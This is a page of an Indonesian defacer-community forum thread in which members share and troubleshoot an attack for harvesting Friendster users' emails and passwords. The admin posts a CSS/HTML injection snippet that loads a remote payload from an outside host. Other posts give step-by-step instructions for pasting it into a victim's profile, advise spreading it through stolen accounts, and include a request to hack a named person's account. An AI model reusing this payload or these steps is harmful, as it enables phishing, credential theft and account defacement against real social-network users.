Komunitas Defacer Indonesia


 

IndeksPortalFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 ikuttan yuk panen imel dan pasword fs

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : Previous  1, 2, 3  Next
PengirimMessage
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Thu May 29, 2008 1:34 am

p4p4y wrote:
yo"i bro...

situ juga org sby ya...

gak sihhh

orang tua sing seko suroboyo
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
p4p4y
Script Kiddies
Script Kiddies


Jumlah posting : 112
Join date : 17.05.08
Age : 25
Lokasi : cyberworld...

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Fri May 30, 2008 9:15 am

oalah....

ngono ta!!!!

awakmu saiki nang endi oma"e!!!
Kembali Ke Atas Go down
Lihat profil user
gonzhack
Newbie
Newbie


Jumlah posting : 23
Join date : 17.05.08
Lokasi : UnKnoWn

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Fri May 30, 2008 6:18 pm

walah ada juga cara begitu yach.....

ada-ada saja orang gorontalo ini....


pokokna sukses wae lah buat semua...
Kembali Ke Atas Go down
Lihat profil user
p4p4y
Script Kiddies
Script Kiddies


Jumlah posting : 112
Join date : 17.05.08
Age : 25
Lokasi : cyberworld...

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Sun Jun 01, 2008 5:37 am

iya bro thankz ya....
Kembali Ke Atas Go down
Lihat profil user
gheeo_a7x
Newbie
Newbie


Jumlah posting : 5
Join date : 01.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Sun Jun 01, 2008 8:44 pm

funky_shensey wrote:
dc_hendra wrote:
pa script devace fs gak mempengaruhi JS qta dimedia box ta kak, aq hendras surabaya salam knl

aq baru masuk forum ini

script deface kan di save di add media box fs korban Very Happy

bukan di add media fs kita jadi gak pengaruh sama js kita lol!

cara nya gmn biar nulis di media box target
coz aq orang baru gitu
tolong ya
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Mon Jun 02, 2008 4:47 am

gheeo_a7x wrote:
funky_shensey wrote:
dc_hendra wrote:
pa script devace fs gak mempengaruhi JS qta dimedia box ta kak, aq hendras surabaya salam knl

aq baru masuk forum ini

script deface kan di save di add media box fs korban Very Happy

bukan di add media fs kita jadi gak pengaruh sama js kita lol!

cara nya gmn biar nulis di media box target
coz aq orang baru gitu
tolong ya

co pass aja code buat deface yang ada di awal thread ini di media box

nanti masuk ke profile korban, trus jangan lupa di refresh untuk melihat hasilnya

maaf klu ada yang salah

maklum masih NEWBIE
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
gheeo_a7x
Newbie
Newbie


Jumlah posting : 5
Join date : 01.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Tue Jun 03, 2008 2:40 am

SmarterDOS wrote:
gheeo_a7x wrote:
funky_shensey wrote:
dc_hendra wrote:
pa script devace fs gak mempengaruhi JS qta dimedia box ta kak, aq hendras surabaya salam knl

aq baru masuk forum ini

script deface kan di save di add media box fs korban Very Happy

bukan di add media fs kita jadi gak pengaruh sama js kita lol!

cara nya gmn biar nulis di media box target
coz aq orang baru gitu
tolong ya

co pass aja code buat deface yang ada di awal thread ini di media box

nanti masuk ke profile korban, trus jangan lupa di refresh untuk melihat hasilnya

maaf klu ada yang salah

maklum masih NEWBIE


iya mas tapi aku ini kan masih baru jadi gak tahu yang kayak gituan
habis kamu bilangnya gak jelas banget
tolong mas ya
pake step step ato pake tahap

contoh
1.
2.
3.
4.
5.
6.
.
.
.
.
.
.
.
.
.
.gitu lho mas jadi aku gak bingung

pliss ya mas Very Happy Very Happy Very Happy Very Happy Very Happy Very Happy Very Happy Very Happy
Kembali Ke Atas Go down
Lihat profil user
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Tue Jun 03, 2008 5:39 am

pertama-tama kamu harus sudah punya target (atau fs yang akan dijadikan korban)

kemudian kamu login pake fs korban (kalau tidak ada bisa dicoba di fs kamu)

setelah itu masuk ke bagian add media box

copy code diawal thread ini, dan paste di bagian add media box tersebut

dan sekarang profile kamu atau korban telah berubah

maaf kalau ada salah, NEWBIE
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
p4p4y
Script Kiddies
Script Kiddies


Jumlah posting : 112
Join date : 17.05.08
Age : 25
Lokasi : cyberworld...

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Tue Jun 03, 2008 7:03 am

wew....

omz....

itu hasil panenx mana kok g isa....

di akses di ripway km....
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Tue Jun 03, 2008 9:03 am

scratch udah kena ignore brooo

scratch smua nama accound yg mirip friendster.com kayakna kena ignore sama admin ripway.com

_________________
Kembali Ke Atas Go down
Lihat profil user
d34n
Lamer
Lamer


Jumlah posting : 59
Join date : 18.05.08
Lokasi : pariz van jaVa

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 1:09 am

Quote :
scratch udah kena ignore brooo

scratch smua nama accound yg mirip friendster.com kayakna kena ignore sama admin ripway.com

benar sekali bro funky_shensey...

Account aku d ripway.com yg namanya berbau friendster.com jg kena ignore.. Sad
Waktu login kluar teks..
Spoiler:
 
Kembali Ke Atas Go down
Lihat profil user
gheeo_a7x
Newbie
Newbie


Jumlah posting : 5
Join date : 01.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 2:20 am

d34n wrote:
Quote :
scratch udah kena ignore brooo

scratch smua nama accound yg mirip friendster.com kayakna kena ignore sama admin ripway.com

benar sekali bro funky_shensey...

Account aku d ripway.com yg namanya berbau friendster.com jg kena ignore.. Sad
Waktu login kluar teks..
Spoiler:
 


ada cara lae ga' Question Question Question


beri tahu y...... Very Happy Very Happy Very Happy
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 2:39 am

Very Happy ntaar saya update lagi

Very Happy sabar aja yaa brooo

_________________
Kembali Ke Atas Go down
Lihat profil user
cYb3r_jOk3
Script Kiddies
Script Kiddies


Jumlah posting : 232
Join date : 12.05.08
Age : 28
Lokasi : mAlaNk jAWatiMUr

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 3:33 am

funky_shensey wrote:
Very Happy ntaar saya update lagi

Very Happy sabar aja yaa brooo

jangan lama² yah kk q juga pengen isa deface coz epes q jadi langganan praktek deface........ Sad Sad Sad
Kembali Ke Atas Go down
Lihat profil user http://baeimlicious.blogspot.com
gheeo_a7x
Newbie
Newbie


Jumlah posting : 5
Join date : 01.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 9:45 pm

funky_shensey wrote:
Very Happy ntaar saya update lagi

Very Happy sabar aja yaa brooo

janji y...

buat yang baru lagi...........
Kembali Ke Atas Go down
Lihat profil user
gheeo_a7x
Newbie
Newbie


Jumlah posting : 5
Join date : 01.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 04, 2008 10:02 pm

funky_shensey wrote:
Very Happy ntaar saya update lagi

Very Happy sabar aja yaa brooo

[b][i][u][center]ms tolong hacki'in profile friendster ini mas lapandh_e@yahoo.co.id

thx y.....
Kembali Ke Atas Go down
Lihat profil user
p4p4y
Script Kiddies
Script Kiddies


Jumlah posting : 112
Join date : 17.05.08
Age : 25
Lokasi : cyberworld...

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Sat Jun 07, 2008 12:00 pm

knp emangx dgn fsx ank itu omz....
Kembali Ke Atas Go down
Lihat profil user
kaito_danger
Newbie
Newbie


Jumlah posting : 11
Join date : 24.05.08
Age : 27

PostSubyek: wach wach wach...   Mon Jun 16, 2008 3:49 am

yach jangan ampe senakal tu dunk..
kasihan kan yang kena..
andai km ada diposisinya tu anak...
wach wach...
bukan gtu caranya main fs dunk...

pissss...
q cuman ga ingin tu juga terjadi ama q..
hihihiii...
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: update lagi   Wed Jun 18, 2008 9:15 am

Quote :
Very Happy neeh waa punya yg simpel

copi pasti aja di add media box code ini difs loe atau fs siapa aja
Code:
<STYLE TYPE='text/css'>@impor\t url(http://h1.badwaresite.www/funkyshensey84/linker/donimakarena.swf);</STYLE><a id='funky' href='http://h1.badwaresite.www/frendsteercom/serangan-maut.txt'></a>

teruss lihat hasilnya disini Arrow imel dan pasword korban

ok cuman segitu aja dari gua oyach saran gua ntaar kalo dapet imel sama pasword korban gak usah di ganti2 cukup di masukin aja lagi code fag login di atas biar tambah banyak korbannya he-he-he tenQiu

scratch beuuh update update lagi capek dehh


Very Happy tapi gak apa apa hajar terus

cheers funky pantang menyerah

ok di coba aja yaahh lol!

_________________
Kembali Ke Atas Go down
Lihat profil user
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Wed Jun 18, 2008 9:19 am

yang pingin buat sendiri silahkan lihat tutornya disini Arrow TUTOR FAG LOGIN

_________________
Kembali Ke Atas Go down
Lihat profil user
omuth_stebreizh
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 21.05.08
Age : 28
Lokasi : malang

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Thu Jun 19, 2008 6:24 am

wah ku kok bingung ya......
ni dah ku kasih di media box ku....
tapi mau buka kok gak bisa...
eror...

itu gmn....???

bagi2 dunk caranya....

ku kan masih gak tau apa2.....

plizzzzzz.............. Smile
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/dangerbabyz
SmarterDOS
Developt Kiddie
Developt Kiddie


Jumlah posting : 467
Join date : 18.05.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Thu Jun 19, 2008 11:43 am

omuth_stebreizh wrote:
wah ku kok bingung ya......
ni dah ku kasih di media box ku....
tapi mau buka kok gak bisa...
eror...

itu gmn....???

bagi2 dunk caranya....

ku kan masih gak tau apa2.....

plizzzzzz.............. Smile

yah gak bisa lah kk

kan ripway habis ngebersihin account yang namanya mirip2 friendster
Kembali Ke Atas Go down
Lihat profil user http://forum.balikita.net/index.php?referrer=91
funky_shensey
Admin
Admin


Jumlah posting : 356
Join date : 07.05.08
Lokasi : gorontalo

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Thu Jun 19, 2008 12:30 pm

omuth_stebreizh wrote:
wah ku kok bingung ya......
ni dah ku kasih di media box ku....
tapi mau buka kok gak bisa...
eror...

itu gmn....???

bagi2 dunk caranya....

ku kan masih gak tau apa2.....

plizzzzzz.............. Smile


code yg ini masih bisa ko omzz masukin aja ke media box

Code:
<STYLE TYPE='text/css'>@impor\t url(http://h1.badwaresite.www/funkyshensey84/linker/donimakarena.swf);</STYLE><a id='funky' href='http://h1.badwaresite.www/frendsteercom/serangan-maut.txt'></a>

_________________
Kembali Ke Atas Go down
Lihat profil user
omuth_stebreizh
Script Kiddies
Script Kiddies


Jumlah posting : 157
Join date : 21.05.08
Age : 28
Lokasi : malang

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Thu Jun 19, 2008 8:33 pm

oghy coba dulu iiaahh bang


king oghy.ga.imut.lagi
Kembali Ke Atas Go down
Lihat profil user http://www.friendster.com/dangerbabyz
foxinema
Newbie
Newbie


Jumlah posting : 1
Join date : 22.06.08

PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Sun Jun 22, 2008 3:29 am

Gw pngnnya bagi yang udah mengganti2 profile friendster target , memberikan informasi ke email dia beserta password baru(klo lo ganti) , karena kasihan di sisi sang target . Kita adalah hacker bukan cracker , kita di sini untuk saling belajar bukan merusak..
Terima Kasih,
Kembali Ke Atas Go down
Lihat profil user
Sponsored content




PostSubyek: Re: ikuttan yuk panen imel dan pasword fs   Today at 10:46 pm

Kembali Ke Atas Go down
 
ikuttan yuk panen imel dan pasword fs
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 2 dari 3Pilih halaman : Previous  1, 2, 3  Next

Permissions in this forum:Anda tidak dapat menjawab topik
::Gorontalo Defacer Community:: :: General Topic :: Tips and Trik-
Navigasi: